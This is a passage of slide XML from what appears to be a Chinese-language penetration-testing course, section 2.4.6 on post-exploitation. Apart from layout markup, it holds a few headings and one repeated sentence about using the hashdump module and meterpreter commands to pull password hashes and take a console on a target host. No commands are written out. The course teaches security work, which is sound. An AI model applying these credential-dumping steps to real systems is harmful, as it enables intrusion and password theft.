            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.6 后渗透攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide2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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1551305" y="1825625"/>
            <a:ext cx="8950960" cy="3303905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:t>使用hashdump模块来提取系统的用户名和密码哈希值，利用meterperter相关命令来获取目标主机控制台。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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9" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.6 后渗透攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide2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a:xfrm>
            <a:off x="5959255" y="1280795"/>
            <a:ext cx="4070985" cy="2908300"/>
            <a:chOff x="6387147" y="1859239"/>
            <a:chExt cx="4455396" cy="2908300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6387147" y="1962744"/>
              <a:ext cx="485083" cy="429895"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6943116" y="1859239"/>
              <a:ext cx="3899427" cy="2908300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:no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indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>meterperter命令。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6387842" y="1998939"/>
              <a:ext cx="555274" cy="387350"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【相关知识】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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14" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.6 后渗透攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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a:xfrm>
            <a:off x="5590261" y="1695539"/>
            <a:ext cx="5567680" cy="1552575"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="5567680" cy="1552575"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7133311" y="2086569"/>
              <a:ext cx="5062220" cy="1337945"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>      </a:t>
              </a:r>
              <a:r>
                <a:rPr dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>本项目使用hashdump模块来提取系统的用户名和密码哈希值，利用meterperter相关命令来获取目标主机控制台。</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实例】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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11" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
